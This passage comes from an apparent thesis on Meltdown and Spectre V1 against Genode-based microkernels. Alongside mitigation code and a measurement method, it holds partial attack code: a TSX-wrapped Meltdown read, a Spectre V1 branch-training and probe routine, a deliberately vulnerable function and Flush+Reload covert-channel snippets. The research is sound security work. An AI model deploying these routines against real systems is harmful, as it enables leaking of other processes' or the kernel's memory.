Lipp et al. [31] created a Proof-Of-Concept (POC) implementation for Meltdown which can be found on Github4. The control flow of the attack is implemented as follows:

1. Flush the shared array from the cache.

2. Access shared memory array at an address calculated based on the value at the targeted address.

3. Recover from the triggered segmentation fault.

4. Test indices in the shared array for a cache hit.


Several tools have been used to execute these steps. To flush the targeted address, the clflush instruction has been used [31]. Shared memory is used in the case of Flush+Reload, which is a well-performing side channel [48]. Recovering from the segmentation fault can be handled in Linux via custom signal handlers, or more efficiently via Intel TSX [31]. For the last step of testing values for cache hits, two methods are presented here: testing after each read, and testing all values after a single read. The latter is discussed in two versions: testing all values using a mixed-order iteration, and testing all values using a large offset. In addition, it is necessary to accurately determine which cache level a memory access was served from. To do this, a high-resolution timer like the TSC can be used [31]. Such timers are, however, not strictly necessary, as there are techniques to construct a high-resolution timer from lower-resolution ones [41].

An attacker targeting Genode and microkernels faces some limitations related to the tools discussed above. Signal handling of certain signals, including segmentation faults, is not as flexible as needed on Genode [7].

Caching of the targeted data may be an unreasonable prerequisite. Intel TSX has been utilized in place of signal handling to recover from the segmentation fault; this method has proven the most effective [31], the reason being that there is hardware support for reverting a transaction. Thus, the OS cannot observe that a faulty access was made during this transaction [31].
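The following sketch illustrates how such a TSX-wrapped access might look in C using the RTM intrinsics. It is not the thesis's implementation: the parameter names are illustrative, and it assumes a CPU with TSX, compilation with RTM support (e.g., -mrtm on GCC), and the Flush+Reload machinery of Section 2.3 for the subsequent probe step.

#include <stdint.h>
#include <immintrin.h>   /* _xbegin, _xend, _XBEGIN_STARTED (requires -mrtm) */

#define PAGE_SIZE 4096

/* One Meltdown attempt wrapped in a TSX transaction: the faulting read aborts
 * the transaction instead of raising a visible segmentation fault, but the
 * transient access may still leave probe_array[value * PAGE_SIZE] in the
 * cache, where Flush+Reload can recover it afterwards. */
static void meltdown_attempt(const volatile char *target,
                             volatile uint8_t *probe_array)
{
    if (_xbegin() == _XBEGIN_STARTED) {
        uint8_t value = *target;                 /* illegal read */
        (void)probe_array[value * PAGE_SIZE];    /* transient cache encode */
        _xend();                                 /* normally never reached */
    }
    /* If the transaction aborted, execution resumes here without a fault. */
}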

2.4.4

Mitigations

There have been efforts to mitigate both Meltdown and Spectre in software; consequently, there is a need to present which mitigations exist, how they work and how they are applied.

Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown by removing the kernel map from user space, thereby removing Meltdown's ability to access kernel memory [31]. KAISER has since been renamed Kernel Page-Table Isolation (KPTI) and was introduced in version 4.15-rc4 of the Linux kernel5. Prout et al. [36] found that KPTI slowed down disk accesses by up to 50% due to the increased execution time of a user-to-kernel context switch.

2.4.5

Meltdown on Genode

Genode’s founder Feske6 has discussed the implications of Meltdown on Genode. Feske stated that due to the minimalistic responsibilities of the microkernel, there is not as much information to leak from the kernel. Furthermore, the only memory pages shared between user applications and the kernel are thread control blocks. This limits the accessible information through shared LLC. Feske also suggested that the Meltdown attack should be tested on different kernels to get a complete picture of what information can be leaked.

Genode’s signal handling is not as adaptable as the one in Linux. An attacker cannot install a custom handler for the segmentation fault [7]. Consequently, the attacker cannot recover from a segmentation fault in this way.

2.5

Spectre

Spectre is a class of microarchitectural attacks leveraging speculative execution on some modern processors [24]. Spectre attacks can be used to read memory from other user processes or the kernel. Kocher et al. [24] described four different attacks; in this thesis, we will focus on the attack exploiting conditional branches, Spectre Version 1 (Spectre V1).


2.5.1

Spectre V1 Attack Description

Spectre V1 exploits speculative execution to bypass conditional branches. To execute Spectre V1, an attacker first needs to find a vulnerable function in another process. One example of a vulnerable function can be seen in Listing 2.5. For this example to work, shared_array needs to point to memory shared by the attacker and the victim. This example function is vulnerable to an SCA which can allow an attacker to read private_array, but by using Spectre V1, an attacker could also read data outside private_array.

By calling the function read_data many times with idx smaller than the size of private_array, an attacker can train the CPU to speculatively evaluate the condition on line 2 to true and, consequently, execute line 3. The speculative execution can be triggered if the variable size_of_private_array is not cached and therefore takes hundreds of CPU cycles to fetch. If the CPU, after this speculative execution, evaluates the condition on line 2 to false, line 3 is never committed. The speculative execution may still have left data in the cache, which may be read by the attacker using Flush+Reload or another cache-based SCA.

Listing 2.5: A function which is vulnerable to Spectre V1.

1 void read_data(unsigned int idx){

2 if (idx < size_of_private_array)

3 dummy = shared_array[private_array[idx]];

4 }
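To make the attacker's side concrete, the sketch below follows the steps just described against the function in Listing 2.5: train with in-bounds indices, evict the bound so the comparison stalls, make one out-of-bounds call, and recover the value with Flush+Reload. It is written as if everything were reachable from one address space, in the style of Kocher et al.'s proof of concept; the helpers flush_shared_array and probe_shared_array stand in for the Flush+Reload primitives of Section 2.3 and are assumptions, not code from the thesis.

#include <x86intrin.h>   /* _mm_clflush */

extern void read_data(unsigned int idx);   /* victim entry point (Listing 2.5) */
extern void flush_shared_array(void);       /* assumed Flush+Reload helper */
extern int  probe_shared_array(void);       /* assumed: returns the leaked byte, or -1 */
extern unsigned int size_of_private_array;

static int spectre_attempt(unsigned int malicious_idx)
{
    /* 1. Train the branch predictor with in-bounds indices. */
    for (unsigned int i = 0; i < 30; i++)
        read_data(i % size_of_private_array);

    /* 2. Evict the bound so the comparison must wait on a slow load,
     *    and clear the probe array for the later reload phase. */
    _mm_clflush((const void *)&size_of_private_array);
    flush_shared_array();

    /* 3. The mispredicted call transiently reads out of bounds. */
    read_data(malicious_idx);

    /* 4. Recover the transiently accessed value with Flush+Reload. */
    return probe_shared_array();
}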

2.5.2

Spectre V1 Mitigations

Spectre V1 relies on speculative execution for its exploit; thus, a straightforward approach to mitigation would be to disable speculative execution. Disabling speculative execution may, however, degrade performance according to Kocher et al. [24]. Another strategy proposed by Kocher et al. is to apply a bitmask to the index, effectively forcing the index to be within the bounds of the array. Because the masked access depends on the preceding computation, this method does not allow the array access to be out of bounds [19].

2.5.2.1 Preventing Speculative Execution

Intel recommends the use of the lfence instruction to prevent speculative execution, as it serializes instructions and performs better than other serializing instructions [18]. Listing 2.6 shows how the lfence instruction can be applied to mitigate Spectre V1 in the vulnerable function.

Listing 2.6: A function which was vulnerable to Spectre V1 after the load fence mitigation has been applied.

1 void victim(size_t idx) {

2 if(idx < array_size) {

3 _mm_lfence(); // Guaranteed to be executed

4 int foo = array[idx]; // after condition is evaluated

5 do_something(foo);

6 }

7 }

Microsoft has added a feature to its MSVC compiler which allows the compiler to add a speculative code execution barrier, similar to lfence. This mitigation should have a negligible impact on performance according to Microsoft7.

7Microsoft. "/Qspectre". In: (Oct. 2018). URL: https://docs.microsoft.com/en-us/cpp/build/reference/qspectre?view=vs-2019 (visited on 2019-04-16).


2.5.2.2 Index Bitmasking

Stuart [43] showed a Spectre V1 mitigation which uses bit operations to remove the possibility of indexing outside the array. Listing 2.7 shows an example of a function which uses these bit operations to mitigate a Spectre V1 attack. Line 5 in the listing sets mask to a negative number if idx >= size. The OR with idx on line 5 prevents an attacker from overflowing the conversion8. After the arithmetic right shift on line 7, mask contains only 1s if idx >= size, and only 0s otherwise. This code depends on arithmetic right shift of negative values, which is implementation-defined9 and thus depends on the compiler and architecture. Line 9 inverts mask to simplify the operation on line 11, where idx is AND:ed with either all 1s, if idx < size, or all 0s otherwise. Hence, the array cannot be indexed with a value greater than or equal to size.

Listing 2.7: A function which was vulnerable to Spectre V1 after the bitmask mitigation has been applied.

1 void victim(unsigned long idx) {

2 // unsigned long size

3 if (idx < size){

4 // Set mask to a negative number if idx >= size

5 long mask = idx | (size - 1 - idx);

6 // mask = 0xFFF... if mask < 0 else 0x000...

7 mask >>= (sizeof(long) * 8 - 1); // arithmetic right shift

8 // mask = 0xFFF... if mask = 0x000... else 0x000...

9 mask = ~(mask);

10 // idx & mask = idx if mask = 0xFFF... else 0

11 int foo = array[idx & mask];

12 }

13 }

A mitigation similar to the one described in Listing 2.7 has been implemented in the Linux kernel10, see Listing 2.8. This mitigation uses two instructions to perform the bit masking. The first instruction, "cmp %1,%2", sets the carry flag to 1 if idx < size. The next instruction, "sbb %0,%0", sets mask either to -1, if the carry flag is set, or to 0 otherwise. Consequently, array_index_mask_nospec will return 0x00000000 if idx >= size and 0xFFFFFFFF otherwise. AND:ing idx with the returned value will give idx if idx is in range and 0 otherwise.

8J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/Articles/744287/ (visited on 2019-03-25).

9Arithmetic operators. URL: https://en.cppreference.com/w/c/language/operator_arithmetic (visited on 2019-03-25).

10D. Williams. x86: Implement array_index_mask_nospec. Jan. 2018. URL: https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/commit/?id=babdde2698d482b6c0de1eab4f697cf5856c5859 (visited on 2019-03-26).


Listing 2.8: A function which was vulnerable to Spectre V1 after the built-in Linux kernel mitigation has been applied.

1 /* Source from

2 * https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git

3 * commit = babdde2698d482b6c0de1eab4f697cf5856c5859

4 */

5 static inline unsigned long

6 array_index_mask_nospec(unsigned long idx, unsigned long size) {

7 unsigned long mask;

8 asm ("cmp %1,%2;" "sbb %0,%0;"

9 :"=r" (mask) :"r"(size),"r" (index) 10 :"cc");

11 return mask;

12 } 13

14 void victim(unsigned long idx) { 15 // unsigned long size

16 if (idx < size){

17 idx &= array_index_mask_nospec(idx, size); 18 int foo = array[idx];

19 }

20 }

2.6

Performance

In order to evaluate the performance impact of Spectre mitigations on RPC, a basic understanding of IPC performance and microkernel performance is needed. In addition, we present criticism of microkernel performance and of the performance of monolithic designs.

2.6.1

Microkernel Performance

Lameter [26] has compared the performance of the monolithic Linux kernel to that of an abstract microkernel and discusses the microkernel's inability to scale with increasing numbers of processes.

2.6.2

IPC Performance

Immich et al. [17] analyzed IPC performance by measuring the time it took for two processes to exchange messages over different IPC mechanisms; to get the current time, the function gettimeofday was used, since it provides microsecond accuracy. A similar study has been done for Sel4's current IPC [49], which examined the overhead of allocating different IPC mechanisms as well as the execution time of using them.
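A minimal sketch of this style of measurement is shown below: a gettimeofday timestamp is taken before and after one exchange, giving the elapsed time in microseconds. The exchange function is a hypothetical placeholder for whichever IPC mechanism is being measured.

#include <sys/time.h>

/* Measure the wall-clock time of one message exchange, in microseconds. */
static long time_exchange_us(void (*exchange_message)(void))
{
    struct timeval before, after;

    gettimeofday(&before, NULL);
    exchange_message();
    gettimeofday(&after, NULL);

    return (after.tv_sec - before.tv_sec) * 1000000L
         + (after.tv_usec - before.tv_usec);
}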

2.7

Related Work

Genode is not the only solution for process separation and resource limitation; for a good understanding of the benefits and disadvantages of microkernels, the alternative solutions need to be understood. Besides, there is a body of work relating to Genode and security which is not specifically about microarchitectural attacks but which does motivate an interest in investigating them.


2.7.1

Genode

Genode has seen work related to security. Constable et al. [5] worked on extending formal Sel4 verification to a Virtual Machine Monitor (VMM) running on Genode. Lange et al. [28] used Genode and a microkernel to form a secure encapsulation of smartphone OSs. Waddington et al. [46] implemented a high-performance web cache using Genode+Fiasco.OC. Hamad and Prevelakis [13] measured IPsec performance on Genode running on Raspberry Pis.

Several other works have focused on using Genode as a means to achieve a secure OS. Brito et al. [1] used Genode as a secure kernel base to process images securely in an ARM TrustZone cloud environment. Ribeiro et al. [38] used Genode to construct a Trustzone-backed database management system. Ramos [37] proposed the development of a toolkit, using Genode as a base, to ease the development of Trustzone projects. Harp et al. [14] recommend a reference architecture, ISOSCELES, for medical devices building on Genode, using either Nova or Sel4 as a microkernel base. Hamad et al. [12] used Genode to implement a secure intra-vehicle communication framework, utilizing its IPC mechanisms for efficient message passing.

Genode has seen little work related to microarchitectural attacks and side channels. Schmidt et al. [39] constructed a covert channel in Genode which exploited a software cache as a timing channel. However, to the best knowledge of the authors, there has been no other work relating to SCAs in Genode.

2.7.2

Side Channels

Xiao et al. [47] demonstrate a covert channel using execution time for write accesses to shared memory pages. They leverage the Copy-On-Write (COW) technique, which is commonly used for shared memory implementations. COW copies the requested page and writes to the copy on demand, thus revealing if a page is shared or not by measuring the time of executing a write [47]. Xiao et al. [47] also demonstrate, using this technique, examples of a covert channel transmitting 50-90 bps for practical applications.

Pessl et al. [35] present a covert cross-CPU channel utilizing varying access times of memory banks in DRAM. They demonstrated a channel with a capacity of 2.1 Mbps with an error probability of 1.8%, and a cross-VM channel with a capacity of 596 kbps with an error probability of 0.4%.

2.7.3

Microarchitectural Attacks

Mcilroy et al. [33] examined the deep-seated implications of how Spectre and incorrect hardware models affect confidentiality-enforcing programming languages. Mcilroy et al. showed that these confidentiality guarantees are completely compromised by Spectre. Koruyeh et al. [25] showed that the Return Stack Buffer (RSB) could be exploited instead of the BPU, thus introducing a class of SpectreRSB attacks. Koruyeh et al. were not successful in demonstrating these attacks on ARM and AMD CPUs. However, ARM and AMD CPUs also utilize an RSB and should therefore be vulnerable.

There has also been work examining SCAs targeting ARM Trustzone. Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation used by the Keymaster trustlet. Another work by Bukasa et al. [3] showed the ineffectiveness of Trustzone to prevent power analysis SCAs.

Microarchitectural attacks are also a quickly progressing field. A recent work by Schwarz et al. demonstrated the ZombieLoad attack, a new type of microarchitectural attack which exploits a fill buffer to read data from other processes [40]. This fill buffer is a type of load


2.7.4

Linux Control Groups

The Linux kernel implements limitation of resources in the form of control groups (cgroups). According to the man-page for cgroups:

"A cgroup is a collection of processes that are bound to a set of limits or parameters defined via the cgroup filesystem." [4]

Cgroups can restrict the use of resources like CPU and memory for processes in a cgroup. Cgroups may also provide guarantees of CPU time for processes in a group. However, unlike Genode, cgroups do not allow non-root processes in a cgroup to have children of their own [4].

2.7.5

Security by Virtualization

Using a small kernel is not the only way to potentially enhance the security of a system. Another feasible option is to use different virtual systems to separate processes. The virtual systems need to run on a hypervisor, which may itself be attacked. Thongthua and Ngamsuriyaroj [44] discuss some weaknesses they found in popular hypervisor software. However, the abstraction of virtualization does not prevent microarchitectural attacks such as Meltdown or Spectre [31, 24]. Irazoqui et al. [21] recovered an AES key in a cross-virtual-machine setup using an SCA that abused the LLC. The attack does not depend on the virtual machines running on the same core, since the LLC is shared. Virtualization also adds overhead by handling multiple OSs running on the same hardware.


3

Method

This chapter begins by presenting how the tested system was set up, including how output was obtained and how the kernels were set up with Genode and booted. Secondly, it presents the design and measurement method used for the covert Flush+Reload channel. Thirdly, the designs of the Meltdown attack and the Spectre V1 attack are presented. Lastly, the methodology for measuring the performance impact of Spectre V1 mitigations is presented.

3.1

Setting up System Under Test

The System Under Test (SUT) is composed of Genode with a microkernel core, an attack implementation and an output channel. This setup was executed on an Intel Core i5-7500 CPU.

We used Genode's build tools and documentation to build our implementation for each kernel1. These build tools were available at Genode's Github page2. To run a build, Genode requires an init-component which is assigned all system resources; Genode then delegates the task of assigning resources to this init-component. We built our implementation by assigning an initial resource budget to our process, thus enabling it to execute, use RPC and allocate memory. Figure 3.1 shows how the init process may start and delegate resources to two user processes. From our configuration, Genode's build tools create the files which are used to boot the kernel with our implementation. These files can be used by Grub2 to multi-boot the tested SUT.

3.1.1

Using x86 Intrinsics

The content from the file:

/genode-gcc/lib/gcc/x86_64-pc-elf/6.3.0/include/mm_malloc.h,

was removed due to a compiler error. This was needed to allow the use of the header file <x86intrin.h>, which provides intrinsics for the rdtsc and lfence instructions.


Figure 3.1: Overview of Genode's Hierarchy (the microkernel and Genode at the base, an init component above them, and two user processes communicating via RPC).

3.1.2

Obtaining Output

Serial communication was used between the system under test and another computer to obtain output from the attacking application, see Figure 3.2. This was necessary as Genode does not include a graphical user interface by default; instead, the default behavior of Genode is to forward all log events to the serial port.

Configuring the serial port required a modification of Bender. Bender is a small kernel which is used to boot the host kernel. By default, on boot, Bender finds a serial port and saves the address of this port to a specific memory address [7]. After that, Bender boots the microkernel and Genode. Genode can then look at that address to know which serial port to forward all logs to.


Figure 3.2: The communication setup to retrieve output from the tested system.

Bender did not choose the correct serial port on the tested PC and was therefore modified to select the serial port in use. The used Bender version can be found at Alexander Boettcher's Github page3.

We changed the bender.c file4 so that com0_port was set to 0x3f8, where 0x3f8 is the address of the serial port on the test PC, as shown by running the command dmesg in Linux. The change made to Bender can be seen in Listings 3.1 and 3.2.

3. https://github.com/alex-ab/morbo/tree/e4744198ed481886c48e3dee12c1fbd47411770f
4. https://github.com/alex-ab/morbo/blob/cb5ec9453af8e7f5d63289aa1884106ce95b4a36/standalone/bender.c


Listing 3.1: Genode’s Default Bender

if (!serial_ctrl.cfg_address && !iobase &&
    serial_ports(get_bios_data_area()) && serial_fallback) {
    *com0_port      = 0x3f8;
    *equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);
}

Listing 3.2: Genode’s Bender After Applied Changes

/* if (!serial_ctrl.cfg_address && !iobase &&
       serial_ports(get_bios_data_area()) && serial_fallback) { */
*com0_port      = 0x3f8;
*equipment_word = (*equipment_word & ~(0xF << 9)) | (1 << 9);
//}

3.1.3 Building and Running on Nova

Genode’s build tool created the files hypervisor and image.elf.gz when an application was compiled for Genode+Nova. These files were located at:

<genode_build_dir>/var/run/spectre/boot,

if an application named "spectre" was compiled. These files can be used in Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Nova by adding the menu entry shown in Listing 3.3, where <boot> is the folder containing hypervisor and image.elf.gz.

Listing 3.3: Grub2 Menu Entry for Nova

menuentry 'Genode Spectre Nova' {
    insmod multiboot2
    insmod gzip
    multiboot2 <...>/bender    # Path to modified bender binary.
    module2 <boot>/hypervisor hypervisor iommu nopid novga serial
    module2 <boot>/image.elf.gz image.elf
}

3.1.4 Building and Running on Okl4

Genode’s build tool created the file image.elf when an application was compiled for Genode+Okl4. This file was located at:

<genode_build_dir>/var/run/spectre/boot,

when an application named "spectre" was compiled. This file can be used with Grub2 to boot the kernel on bare hardware. Grub2 can be configured to boot Okl4 by adding the menu entry shown in Listing 3.4, where <boot> is the folder containing image.elf.


Listing 3.4: Grub2 Menu Entry for Okl4

menuentry 'Genode Spectre Okl4' {
    insmod multiboot2
    multiboot2 <...>/bender    # Path to modified bender binary.
    module2 <boot>/image.elf
}

Our application did not build on Okl4 using the default build file. We added -march=native to compile programs containing assembly instructions. The -march=native flag tells the compiler to tailor the instruction set for the used CPU5.
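For illustration, the flag can be added to the component's build description. The following is a minimal sketch of a target.mk, assuming Genode's usual CC_OPT variable and illustrative file names (this is not the thesis build file):

    TARGET  = spectre
    SRC_CC  = main.cc
    LIBS    = base
    CC_OPT += -march=native   # tailor generated instructions to the build host CPU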

3.1.5 Building and Running on Linux

The output from the Genode application was forwarded from the terminal to the serial port. This was done to use the same measurement methodology as for the two other kernels.

3.1.6 Measuring Throughput

To measure the channel's or the attacks' throughput, a fixed string message m of length n was transmitted. Throughput T was then calculated as the number of correctly transmitted bytes per second (Bps) of transmission. This definition of throughput has been used to measure other microarchitectural attacks [31, 25]. A byte in position i was considered correctly transmitted if the received byte r_i had the same value as the message byte m_i. The throughput, T, was calculated as:

T = \frac{\sum_{i=0}^{n} C(m_i, r_i)}{t_n}    (3.1)

where

C(m, r) = \begin{cases} 1 & \text{if } r = m \\ 0 & \text{otherwise} \end{cases}

t_n = total execution time in seconds
T = throughput of the channel
C(m, r) = function to determine equality of bytes

An array of size 2048 bytes was used to measure throughput. Every leaked byte was forwarded via serial communication to the measuring system, see Figure 3.2. Each received byte was then compared to the corresponding transmitted byte, see Equation (3.1).
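As a concrete illustration of Equation (3.1), the following is a minimal sketch (illustrative names, not the measurement code used in the thesis) of the throughput computation on the measuring system:

    #include <stddef.h>

    /* Throughput in correctly transmitted bytes per second, Equation (3.1). */
    static double throughput_bps(const unsigned char *sent,
                                 const unsigned char *received,
                                 size_t n, double seconds)
    {
        size_t correct = 0;
        for (size_t i = 0; i < n; i++)
            if (received[i] == sent[i])   /* C(m_i, r_i) = 1 */
                correct++;
        return (double)correct / seconds; /* T = sum / t_n   */
    }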

Genode's timer object was used on Nova and Linux to measure the total execution time, t_n, with millisecond accuracy. Some changes were needed in the Genode application's run file, where timer had to be added to build and build_boot_image. The timer object was not used on Okl4; instead, a timer on the measuring system was used to measure t_n. On Okl4, a start-timer command was transmitted via the serial port before the first transmitted byte and an end-timer command after the last byte. The timer on the measuring system was started and stopped by these commands. When Genode's timer object was used, the execution time t_n was transmitted after all bytes had been transmitted.

5. Using the GNU Compiler Collection (GCC): x86 Options. URL: https://gcc.gnu.org/onlinedocs/gcc/x86-Options.html (visited on 2019-03-25).


3.2 Implementing the Flush+Reload Channel

To answer Research Question 1, we first demonstrate that Flush+Reload can be used to create a covert channel between two processes in Genode. To verify the result, we construct two conspiring processes which use Flush+Reload to communicate a message.

Shared memory, allocated to a size of (256 + 2) * Padding, was used for the Flush+Reload channel. The channel uses 256 distinct addresses, one for each possible byte value. These addresses were offset using a padding to prevent prefetching between values. Padding was also used at the beginning and at the end of the array to prevent prefetching of shared-memory addresses from accesses outside of the array.

Figure 3.3 shows how this design is used to transmit a value by caching the corresponding address. The receiver, pictured in the figure, can then measure the access time to each address in the array and conclude which value was transmitted.


Figure 3.3: A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array.
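The transmit side of this layout can be sketched as follows (a minimal illustration assuming a 4 kB padding and a shared array named channel; these names are not taken from the thesis code):

    #include <stddef.h>
    #include <stdint.h>

    #define PADDING 4096   /* page-sized gap between values    */
    #define VALUES  256    /* one slot per possible byte value */

    /* 'channel' points at the shared (VALUES + 2) * PADDING byte array. */
    static volatile uint8_t *channel;

    /* Transmitting a byte caches the address of the corresponding slot;
     * the first PADDING bytes are the leading guard padding. */
    static void transmit(uint8_t value)
    {
        (void)channel[((size_t)value + 1) * PADDING];
    }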

3.2.1 Measuring Cache Hits

A threshold was used to decide whether a value was cached or not. This threshold was determined by profiling the time it took for the CPU to access cached and uncached values [48]. The L1 cache or the LLC was used depending on the attack design. Therefore, two thresholds were defined: one just above the L1 cache access time and one just above the LLC access time.

We assume a memory model of access times as shown in Figure 3.4. In this figure, t_LLC is the upper bound for accessing the LLC and t_L1 is the upper bound for accessing the L1 cache. The thresholds t_LLC and t_L1 were chosen as the upper bound of the measurements for the LLC and the L1 cache, respectively. This choice was made arbitrarily, with the intent of minimizing false positives while preserving true positives.

The time to access a value was measured using the timing function described in Section 2.2.2. To profile uncached accesses, an array of size 4096 * (256 + 2) bytes was used, with an internal padding of 4096 bytes to prevent prefetching.

The time of accessing uncached values was measured by first removing the array from the cache using clflush, and then measuring the time to access each address. A similar method was used to measure the timings for the L1 cache, the difference being that the values were cached in the same process before timing the accesses.
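The uncached-access profiling step can be sketched as follows (a minimal illustration assuming the array layout above and the clflush intrinsic from <x86intrin.h>; names are illustrative, not the thesis code):

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>

    #define PADDING 4096
    #define VALUES  256

    /* Flush every slot, then time each (now uncached) access; the recorded
     * times bound the DRAM access time used to pick the thresholds. */
    static void profile_uncached(volatile uint8_t *probe, uint64_t *times)
    {
        for (int i = 0; i < VALUES; i++)
            _mm_clflush((const void *)&probe[(size_t)(i + 1) * PADDING]);
        _mm_lfence();

        for (int i = 0; i < VALUES; i++) {
            _mm_lfence();
            uint64_t start = __rdtsc();
            _mm_lfence();
            (void)probe[(size_t)(i + 1) * PADDING];
            _mm_lfence();
            times[i] = __rdtsc() - start;
        }
    }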


Figure 3.4: A model of memory access times for different memory levels.


Figure 3.5: A sequence diagram for measurements of the LLC access times.

To profile LLC access times, the values were instead cached by a separate process, see Figure 3.5. Depending on whether the two processes get scheduled on the same core, the values may be cached in either the L1 cache or the LLC.

3.2.2 Preventing Data Prefetching

The in-order loop in Listing 3.5 triggers the CPU to prefetch addresses before they are accessed, which results in false-positive cache hits for subsequent values. The example in Listing 3.6, on the other hand, flushes all possible values and then measures the access times out of order to prevent data prefetching.

Listing 3.5: Flush+Reload
for i in 0..255
    clflush(address + i*Padding)   // Flush channel from cache
wait_for_read()                    // Wait for reloading process
for i in 0..255
    t = time(leak + i*Padding)     // Test value for cache hit, in order
    if t < LLC_THRESHOLD
        cache_hits += 1


Listing 3.6: Flush+Mix
for i in 0..255
    clflush(address + i*Padding)   // Flush channel from cache
wait_for_read()                    // Wait for reloading process
for i in 0..255
    m = (i * a + b) % 256          // a and 256 relatively prime
    t = time(leak + m*Padding)     // Test value for cache hit
    if t < LLC_THRESHOLD
        cache_hits += 1

The offset Padding is used as internal padding to prevent prefetching between values. 4 kB was chosen as the biggest internal padding, as it is the page size on the tested system and the CPU does not prefetch across page boundaries [24, 10]. An example of the array used for the channel can be seen in Figure 3.6, where 4 kB internal padding is used.


Figure 3.6: Leak Array Layout

SRGs were tested for how well they prevent prefetching, measured as no detected cache hits when looping over the array. The SRGs were chosen with modulus m = 256, where a and b in Listing 3.6 were chosen according to the scheme in Section 2.3.2. The SRGs were evaluated by iterating over an array 256 times using indices generated from the SRG. Each access time was measured and checked for a cache hit, as described in Section 3.2.1. The SRGs were further evaluated for the padding sizes 4096, 2048, 1024, 512, 256 and 128 bytes. The limits 4096 and 128 were used as they are the page size and cache line size on the tested system; consequently, the CPU does not prefetch for padding sizes over 4096 bytes, and padding below 128 bytes does not guarantee separation between values.

All SRGs where a ∈ [1, 255] and b = 0 were evaluated. The offset b = 0 was chosen because a constant offset should not affect prefetching, and to limit the number of SRGs to evaluate. Two SRGs are presented: the one with the best performance, in Equation (3.2), and an arbitrarily chosen worse SRG, in Equation (3.3). The second is used to illustrate the characteristics of a poorly performing SRG.

m_i = (49 \cdot i + 0) \bmod 256    (3.2)

m_i = (33 \cdot i + 0) \bmod 256    (3.3)
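The requirement that a and 256 be relatively prime guarantees that the SRG visits every index exactly once. A small check of this property (not part of the thesis code; purely illustrative) can be written as:

    #include <stdbool.h>
    #include <stdio.h>

    /* Returns true if m_i = (a*i + b) mod 256 visits all 256 indices once. */
    static bool srg_is_full_period(unsigned a, unsigned b)
    {
        bool seen[256] = { false };
        for (unsigned i = 0; i < 256; i++)
            seen[(a * i + b) % 256] = true;
        for (unsigned v = 0; v < 256; v++)
            if (!seen[v])
                return false;
        return true;
    }

    int main(void)
    {
        /* Both generators have full period; they differ in how well their
         * stride pattern defeats the prefetcher. */
        printf("a = 49: %d\n", srg_is_full_period(49, 0));
        printf("a = 33: %d\n", srg_is_full_period(33, 0));
        return 0;
    }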

3.2.3 Adapting the Channel to Targeted Kernels

Implementation of Flush+Reload required some adaptations depending on the intended target. One adaptation which had to be made is that the rdtsc instruction was used instead


The timer suggested by Paoloni [34] was used for Linux and Okl4, see Listing 2.2. The alternative timer suggested by Paoloni was used for Nova, see Listing 2.3.

3.2.4 Measuring Throughput of the Covert Channel

The throughput for the covert Flush+Reload channel was measured for use between two processes, see Figure 3.7, and for use inside a single process. The throughput was measured as described in Section 3.1.6.


Figure 3.7: A sequence diagram of Flush+Reload communication between two processes.

The throughput for communicating internally with Flush+Reload was measured using a process which first cleared the leak array from the cache, then cached the current value and used lfence to wait for the transmitted byte to be cached. The process then iterated over all values in the leak array to check for an L1 cache hit. The throughput could then be measured using the method described in Section 3.1.6.
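A minimal sketch of this single-process measurement loop (illustrative constants and names, assuming the layout from Figure 3.6 and the SRG from Equation (3.2); not the thesis implementation) could look as follows:

    #include <stddef.h>
    #include <stdint.h>
    #include <x86intrin.h>

    #define PADDING      4096
    #define VALUES       256
    #define L1_THRESHOLD 64   /* cycles; determined by profiling as in Section 3.2.1 */

    /* Flush the channel, "transmit" one byte by caching its slot, then probe
     * all slots in mixed order and report the first L1 hit as the received value. */
    static unsigned receive_internal(volatile uint8_t *leak, uint8_t sent)
    {
        for (int i = 0; i < VALUES; i++)
            _mm_clflush((const void *)&leak[(size_t)(i + 1) * PADDING]);
        _mm_lfence();

        (void)leak[((size_t)sent + 1) * PADDING];   /* cache the transmitted value */
        _mm_lfence();                               /* wait for the load to finish */

        for (int i = 0; i < VALUES; i++) {
            unsigned m = (49u * (unsigned)i) % 256u; /* SRG from Equation (3.2)    */
            _mm_lfence();
            uint64_t start = __rdtsc();
            _mm_lfence();
            (void)leak[(size_t)(m + 1) * PADDING];
            _mm_lfence();
            if (__rdtsc() - start < L1_THRESHOLD)
                return m;                           /* cache hit: received value   */
        }
        return VALUES;                              /* no hit detected             */
    }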

3.2.5 Reducing Noise

To obtain a reliable Flush+Reload channel it may be necessary to make multiple measurements, as done by others [31, 25]. R measurements, m_{ij}, were taken for each value i with the purpose of increasing the accuracy. A cache-hit detection function f_c with a threshold t_c was used to build a histogram H of recorded cache hits, where each entry h_i is the count of detected cache hits for value i. The estimation \hat{v} of the transmitted value v was calculated as:

\hat{v} = \arg\max_{i \in \{0, \dots, 255\}} h_i, \quad \text{where} \quad h_i = \sum_{j=0}^{R} f_c(m_{ij}) \quad \text{and} \quad f_c(x) = \begin{cases} 1 & \text{if } x < t_c \\ 0 & \text{otherwise} \end{cases}
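This estimation step can be sketched as follows (a minimal illustration with illustrative names, where measurements[i*R + j] holds the j:th measured access time for value i and threshold corresponds to t_c; not the thesis implementation):

    #include <stddef.h>
    #include <stdint.h>

    /* Build the histogram of cache hits and return the value with most hits. */
    static int estimate_value(const uint64_t *measurements, size_t R,
                              uint64_t threshold)
    {
        unsigned hist[256] = { 0 };

        for (size_t i = 0; i < 256; i++)
            for (size_t j = 0; j < R; j++)
                if (measurements[i * R + j] < threshold)   /* f_c(m_ij) = 1 */
                    hist[i]++;

        size_t best = 0;
        for (size_t i = 1; i < 256; i++)                   /* argmax_i h_i  */
            if (hist[i] > hist[best])
                best = i;
        return (int)best;
    }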

In addition, synchronization was needed to increase the probability of a successful transmission. Locking was used to synchronize the transmitter with the receiver.

References
